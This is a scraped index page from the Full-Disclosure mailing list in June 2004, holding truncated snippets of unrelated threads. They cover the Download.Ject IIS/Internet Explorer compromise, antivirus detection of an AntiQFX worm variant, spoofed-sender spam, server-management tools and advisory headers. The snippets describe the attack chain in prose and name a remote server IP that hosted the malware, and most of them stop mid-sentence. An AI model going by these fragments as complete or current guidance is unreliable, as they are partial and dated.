Hi Nick,
It does this via the now very old ms-its: protocol zone-handling bug...
Apparently someone needs to decode a few more levels of JavaScript, etc
to work this all out...
I donĀ“t think so. This looks a lot like the unpatched IE bug that was also
exploited by the Ilookup trojan. See
Hack In The Box Security Conference 2004 : Kuala Lumpur, Malaysia
-
Greetings,
We are inviting individuals or groups who are interested in computer
security, challenges and practices especially the latest technological
innovations
I have - and this annoyance still goes on- experimented something
similar as the stealing of identity reported by Suart (except that
there is so far no hate mail involved, but good old spamming? to
sell junk or offer access to porn sites, which I discovered by getting
undelivered mail sent
On Friday 25 June 2004 07:05, Peter Kruse might have typed:
When the javascript runs it will try to redirect you to a remote server
http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
stored. As far as I know they do not reside on the compromised IIS servers,
but
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Grisoft's AVG 6.0.71 DAT 466 23/06/2004 also detects it as Win32/Antiqfx.
Regards, Paolo
X iniT wrote:
| Hello all,
|
|
| The attached file seems to be a variant of AntiQFX
| worm.
|
| AntiQFX Worm masquerades as
| an old dos utilitly MSCDEX.EXE.
On Friday 25 June 2004 08:36, X iniT might have typed:
AntiQFX Worm masquerades as
an old dos utilitly MSCDEX.EXE. Basically
spreads via shared networks and delets a few
files which belong to a couple of Photo Editting
F-Secure Anti-Virus for Linux version 4.52 build 2461
Copyright (c)
Just a reminder. This isn't the first time this has
happened:
http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675
--
Gary Flynn
Security Engineer
James Madison University
___
Full-Disclosure - We believe in it.
On Jun 24, 2004, at 11:43 PM, lsi wrote:
I can report that not only is this activity continuing, but it is
doing so under the names of ... well, me, at least - I have received
several bounces indicating that my email address is being used as the
from address.
The spammers are using addresses from
For the IIS side
http://www.microsoft.com/security/incident/download_ject.mspx
Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.
Important
Harry,
What you're talking about falls under the realm of Systems / Network
Management. Generally when you have large numbers of servers / devices
to manage you need an effective tool. You can write your own scripts,
but you'd just be duplicating the efforts of a number of available
tools out
With the current (in)security of most (if not all) ISP
that provide ASP.Net or ASP Classic shared hosting
services, all the attakers need to do is to get an
hosting account in a shared hosting server (trivial)
and infect these websites from the inside.
I haven't heard of any new IIS exploit
Having said that, you're going to be disappointed in what snmp will
provide unless you want to start writing MIBs (you don't). So you will
be doing some sort of client/server model maybe with *NIX tools like
vmstat and traceroute and wget. We did something similar in 1998 I
recall.
I
I can only second Charles' and Isi's statements I sent a mail
earlier this morning to the list, and it was bounced back to me by
different engines. I made my case worse by underlining the fact that
the body of the messages sent under my sp**fed identity were either
advertising P*RN
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicuous
anti-Microsoft attempt to discredit
X iniT [EMAIL PROTECTED] wrote:
snip
Look closely and you'll see that i've attached this
file using my yahoo account. Which happens to be
protected by NAV !!!
The following link clearly states that NAV detects
this worm since 2002 !!!
I have to throw cfengine into this mix, too.
http://www.cfengine.com/
Of course... how could I forget cfengine. Another godsend.
Also just remembered: syslog-ng is a good replacement for syslog.
Thx,
Mohit.
--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
There are 10 types of people.
On Thu, 24 Jun 2004 21:12:46 PDT, VX Dude [EMAIL PROTECTED] said:
...and the build broke on OTHER systems
because there wasn't a vsnprintf() in the vendor libc
- and your boss is
telling you TO GET THE THING TO BUILD, NOW
The programmer who is willing to swear on a Bible that
they
Mohit Muthanna wrote:
I'd suggest you read up on SNMP. And check out the following tools
(google them):
- net-snmp ( an SNMP agent )
- nagios ( very sophisticated network management tool )
- nmap ( good discovery tool )
- ntop ( traffic analysis, RMON agent, performance monitoring )
- sar ( system
Berbew/Webber/Padodor Trojan, according to Lurhq.
http://www.lurhq.com/berbew.html
joe wrote:
For the IIS side
http://www.microsoft.com/security/incident/download_ject.mspx
Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information
Nick FitzGerald [EMAIL PROTECTED] wrote:
That's odd -- I had the file scanned with 22 different virus
scanners and only three (NAV, Panda and ClamAV) missed detecting it
as AntiQFX or something very similar...
New patterns for ClamAV have just been released (daily.cvd version 371)
which
Hi!
Same thing is with AVP, ClamV F-Prot.
Only Sophos detects this file as AntiQFX.F variant.
That's odd -- I had the file scanned with 22 different virus scanners
and only three (NAV, Panda and ClamAV) missed detecting it as AntiQFX
or something very similar...
Bitdefender detects it
On Fri, June 25, 2004 8:58 am, Nick FitzGerald said:
That's odd -- I had the file scanned with 22 different virus scanners
and only three (NAV, Panda and ClamAV) missed detecting it as AntiQFX
or something very similar...
ClamAV is now detecting it as well. They must have updated their sigs
Zone-h Security Advisory Date of discovery : 24 june 2004Date of release : 25 june 2004 Bug found by Khan Shirani [EMAIL PROTECTED] http://www.zone-h.org
---Software : DrcatdBugs : Buffer Overflows , Remote and local (multiple)Risk : lowPlatform :
Zone-h Security Advisory Date of discovery : 21 june 2004
Date of release : 24 june 2004 http://www.zone-h.org
Bug found by Khan Shirani [EMAIL PROTECTED]
---Software : GNU Gnats 4.00Bugs : formats string bug(s)Risk : low/mediumPlatform :
FYI
There have been several reports of IIS servers being compromised in a
similar fashion. The result is that each has a document footer specified
which is JavaScript which causes the viewing browser to load a page from
a malicious website. The loaded page installs a trojan via one of
several
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
We are thinking about trying out this technology.
Has anyone used this? Are there any known security risks?
M
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of harry
Sent: Monday, June 21, 2004 6:59 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] server administration
hi all,
i know this is not really a security thing, so if someone
could tell
anybody got a packet dump of the attack yet so we can regex out this vuln against IIS?
It is quite terrible that this IE vuln has gone on now for two weeks - from what I undserstand this is a product feature, and thats why they havent addressed it.
We filter our local redirects at our proxy
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
On Fri, June 25, 2004 12:35 pm, Michael Schaefer said:
Are there any known security risks?
It's made by Microsoft. Isn't that a significant security risk?
-Eric
___
Full-Disclosure - We believe in it.
Charter:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 525-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
June 24th, 2004
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
On Fri, 25 Jun 2004 15:35:51 EDT, Michael Schaefer [EMAIL PROTECTED] said:
Has anyone used this? Are there any known security risks?
(None of this is specific to the product, but all of it is stuff that we as an
industry keep re-botching over and over, so I'll mention it here anyhow...)
Three
One word,
m-o-n-o-p-o-l-y
And what are you going to do about it, punk?
-Original Message-
From: [EMAIL PROTECTED] [mailto:full-disclosure-
[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED]
Sent: Friday, June 25, 2004 10:02 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL
Hi there,
just like to announce, that the new version of the Auditor
security collection (auditor-220604-01B) is available now
at http://www.moser-informatik.ch/?page=productslang=eng
Thanx for your feedback.
Greetings
Max
Changes in this version:
Keyboard mapping is
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Friday, June 25, 2004 11:53 AM
To: [EMAIL PROTECTED]
Subject: Microsoft and Security
snip
A vulnerability:
http://www.microsoft.com/technet/archive/community/columns/securi
ty/essays/vulnrbl.mspx
A
volunteer as an expert witness when the negligence lawsuits
finally arise :)
and you?
Burnes, James [EMAIL PROTECTED] said:
One word,
m-o-n-o-p-o-l-y
And what are you going to do about it, punk?
-Original Message-
From: [EMAIL PROTECTED] [mailto:full-
disclosure-
Does anyone have a good disassembled source listing for the latest
backdoor-axj? Of course if you have the original commented source, I'll
take that also. ;-)
thx
___
Full-Disclosure - We believe in it.
Charter:
As of now the server, which was a russian server has been taken down.
Nasir Ghaznavi
On Fri, 25 Jun 2004 10:36:08 +0100, Duncan Hill
[EMAIL PROTECTED] wrote:
On Friday 25 June 2004 07:05, Peter Kruse might have typed:
When the javascript runs it will try to redirect you to a remote server
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
Dude do you even know what php_exec_dir patch is, its a patch so you dont
have to turn safe mode on, which disables a bunch of shit that you need, so
the patch was a work around simply stop you executing programs.
heres a hint, learn about the product b4 you spam a mailing list, i see 5
posts
42 matches
Mail list logo
